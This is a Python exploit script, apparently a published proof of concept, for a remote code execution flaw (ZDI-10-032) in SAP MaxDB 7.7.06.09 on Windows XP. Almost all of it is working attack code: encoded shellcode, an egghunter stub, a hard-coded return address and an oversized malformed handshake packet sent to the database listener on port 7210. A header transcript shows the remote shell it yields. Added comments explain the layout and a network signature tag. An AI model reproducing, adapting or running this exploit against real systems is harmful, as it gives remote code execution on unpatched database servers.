#!/usr/bin/python
# Exploit title: SAP MaxDB Malformed Handshake Request Remote Code Execution
# Date: 2010.03.26
# Author: S2 Crew [Hungary]
# Software link: sap.com
# Version: 7.7.06.09
# Tested on: Windows XP SP2 EN
# CVE: ZDI-10-032
# Code:
#############################################################
# Trying 172.16.29.133...
# Connected to 172.16.29.133.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\sdb\data\wrk>
#############################################################
#
# Published proof-of-concept for ZDI-10-032: one oversized handshake
# request is sent to the MaxDB listener and the script exits.  Everything
# is fixed for the author's lab -- the target address (also visible in the
# telnet transcript above), the build named in the header, and the `ret`
# value -- so it is tied to that exact version/OS combination.
#
# Written for Python 2: every string literal below is a byte string, which
# is what socket.send() is handed here.  No response is ever read.

import socket
import sys   # unused
import os    # unused

# Payload bytes.  The page does not document what they do; treat them as
# opaque and do not assume anything about their behaviour from this file.
sc = (
"\x31\xc9\xda\xda\xbe\x94\x3f\xbe\xea\xb1\x56\xd9\x74\x24\xf4"
"\x5f\x31\x77\x17\x03\x77\x17\x83\xef\xfc\x76\xca\x42\x02\xff"
"\x35\xbb\xd3\x9f\xbc\x5e\xe2\x8d\xdb\x2b\x57\x01\xaf\x7e\x54"
"\xea\xfd\x6a\xef\x9e\x29\x9c\x58\x14\x0c\x93\x59\x99\x90\x7f"
"\x99\xb8\x6c\x82\xce\x1a\x4c\x4d\x03\x5b\x89\xb0\xec\x09\x42"
"\xbe\x5f\xbd\xe7\x82\x63\xbc\x27\x89\xdc\xc6\x42\x4e\xa8\x7c"
"\x4c\x9f\x01\x0b\x06\x07\x29\x53\xb7\x36\xfe\x80\x8b\x71\x8b"
"\x72\x7f\x80\x5d\x4b\x80\xb2\xa1\x07\xbf\x7a\x2c\x56\x87\xbd"
"\xcf\x2d\xf3\xbd\x72\x35\xc0\xbc\xa8\xb0\xd5\x67\x3a\x62\x3e"
"\x99\xef\xf4\xb5\x95\x44\x73\x91\xb9\x5b\x50\xa9\xc6\xd0\x57"
"\x7e\x4f\xa2\x73\x5a\x0b\x70\x1a\xfb\xf1\xd7\x23\x1b\x5d\x87"
"\x81\x57\x4c\xdc\xb3\x35\x19\x11\x89\xc5\xd9\x3d\x9a\xb6\xeb"
"\xe2\x30\x51\x40\x6a\x9e\xa6\xa7\x41\x66\x38\x56\x6a\x96\x10"
"\x9d\x3e\xc6\x0a\x34\x3f\x8d\xca\xb9\xea\x01\x9b\x15\x45\xe1"
"\x4b\xd6\x35\x89\x81\xd9\x6a\xa9\xa9\x33\x1d\xee\x67\x67\x4d"
"\x98\x85\x97\x63\x04\x03\x71\xe9\xa4\x45\x29\x86\x06\xb2\xe2"
"\x31\x79\x90\x5e\xe9\xed\xac\x88\x2d\x12\x2d\x9f\x1d\xbf\x85"
"\x48\xd6\xd3\x11\x68\xe9\xfe\x31\xe3\xd1\x68\xcb\x9d\x90\x09"
"\xcc\xb7\x43\xaa\x5f\x5c\x94\xa5\x43\xcb\xc3\xe2\xb2\x02\x81"
"\x1e\xec\xbc\xb4\xe3\x68\x86\x7d\x3f\x49\x09\x7f\xb2\xf5\x2d"
"\x6f\x0a\xf5\x69\xdb\xc2\xa0\x27\xb5\xa4\x1a\x86\x6f\x7e\xf0"
"\x40\xf8\x07\x3a\x53\x7e\x08\x17\x25\x9e\xb8\xce\x70\xa0\x74"
"\x87\x74\xd9\x69\x37\x7a\x30\x2a\x47\x31\x19\x1a\xc0\x9c\xcb"
"\x1f\x8d\x1e\x26\x63\xa8\x9c\xc3\x1b\x4f\xbc\xa1\x1e\x0b\x7a"
"\x59\x52\x04\xef\x5d\xc1\x25\x3a\x57")

# 32-byte stub.  The bytes \x54\x30\x30\x57 inside it spell "T00W", the
# same tag that is written directly in front of `sc` in the packet below
# ("T00WT00W").  Together with the constant header prefix of the packet,
# that tag is a static string a network signature can key on.
egghunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x54\x30\x30\x57\x8b\xfa"
"\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# Target from the author's lab (see the transcript in the header).
# 7210 is MaxDB's default listener port.
host = "172.16.29.133"
port = 7210

# Plain TCP; no timeout is set, so an unreachable host blocks here.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

# Four hard-coded bytes spliced into the handshake header at offset 50.
# They are specific to the build/OS named in the file header; the page
# does not state what they overwrite, so do not infer that here.
ret = "\x08\xf1\xa0\x00" # HC

# Request layout: 66 bytes of fixed header (with `ret` at offset 50),
# then 5000 x "A", the "T00WT00W" tag, `sc`, 2500 x 0x41, `egghunter`
# and 2500 x 0x90 -- roughly 10 KB in total.
# NOTE(review): the leading \x63\x00\x00\x00 (= 99) recurs at offset 20;
# if these are length fields they do not match what is actually sent,
# which is presumably the "malformed" part of the title -- not confirmed
# by anything on this page.
packet = (
"\x63\x00\x00\x00\x03\x2f\x00\x00\x01\x00\x00\x00"
"\xff\xff\xff\xff\x00\x00\x04\x00\x63\x00\x00\x00"
"\x00\x02\x4b\x00\x04\x09\x00\x00\x44\x20\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff"
"\x6d\x61" + ret + "\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x07\x49" + "A"*5000 + "T00WT00W" + sc + "\x41" * 2500 + egghunter + "\x90"*2500)

# Single send, then the connection is dropped; the reply (if any) is
# never read, so the script gives no indication of what happened.
s.send(packet)
s.close()